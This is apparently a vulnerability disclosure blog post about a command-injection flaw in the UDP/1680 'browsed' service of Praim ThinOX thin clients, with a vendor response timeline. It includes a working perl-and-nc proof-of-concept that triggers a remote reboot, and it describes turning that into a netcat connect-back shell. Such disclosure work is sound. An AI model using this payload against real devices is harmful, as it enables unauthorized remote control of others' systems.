Remote code execution on Praim thin client devices

Author: Roberto Paleari (@rpaleari), Aristide Fattori (@joystick), and Ruggero Strabla (@rstrabla)

During a recent security assessment we had the opportunity to analyze a thin client device manufactured by Praim, an Italian company that, according to their web site, has "nearly  1 million user installations" of its "Thin & Zero solutions". In detail, our assessment involved some ThinOX I9020 devices, updated with the latest firmware version available.

We noticed our target device was exposing an UDP service listening on port 1680. This service is available in the default configuration and implemented by a binary application named "browsed".

More in detail, "browsed" is a complex application used for the centralized management of the thin client, which, among the other things, also includes a FTP service to upgrade the device firmware. A closer look to the binary application revealed a command-injection vulnerability that can be trivially exploited by an attacker located on the same LAN where the thin client is connected.

Technical details

Data received by "browsed" on port UDP/1680 is eventually fed to a system() library call, without being properly sanitized before. This situation is testified by the code snippet in the figure below, where the program builds a command-line string using the payload of the UDP datagram. The only constraint is that the check at program address 0x00011904 must be satisfied in order for the system() call to be reached; this can be done by setting a specific input byte (at offset 70 of the UDP datagram) to four.


Command-injection vulnerability

As a proof-of-concept, the following command exploits this issue and executes the "reboot" command on the thin client, immediately rebooting the device:

perl -e 'print "\";reboot;\"" . "A"x59 . "\x04" . "B"x63' | nc -u 1.2.3.4 1680 

Obviously, in the command above "1.2.3.4" must be replaced with the actual IP address of the vulnerable ThinOX device.

The device already includes the netcat utility, so gaining a remote shell on the thin client is just a matter of changing the above command-line to leverage nc to connect-back to the attacker's IP and spawn a shell, as shown in the picture below (astute readers will notice the connect-back shell originates from 127.0.0.1; the reason is that, for this test, we executed the vulnerable application inside an emulated environment).

Gaining a connect-back shell from the Praim ThinOX device

Disclosure

We notified Praim about this vulnerability on February 24th, 2014. The vendor promptly replied and started to work on the issue. However, some weeks later (on March 14th) Praim informed us that they were aware of this issue but, according to them, "no sensitive data is stored inside the thin client", so they are not planning to release a fix for this issue anytime soon. We do not fully agree with this statement, as attackers could still abuse a compromised thin client to intercept sensitive data, e.g., by installing a key logger on the device and capturing authentication credentials for remote hosts as soon as they are typed in by the user, even if not stored persistently inside the thin client.

According to Praim, the vulnerability will probably be addresses in a future firmware version (still under development) that will replace the UDP service ("browsed") with a completely different management interface.


No comments:

Post a Comment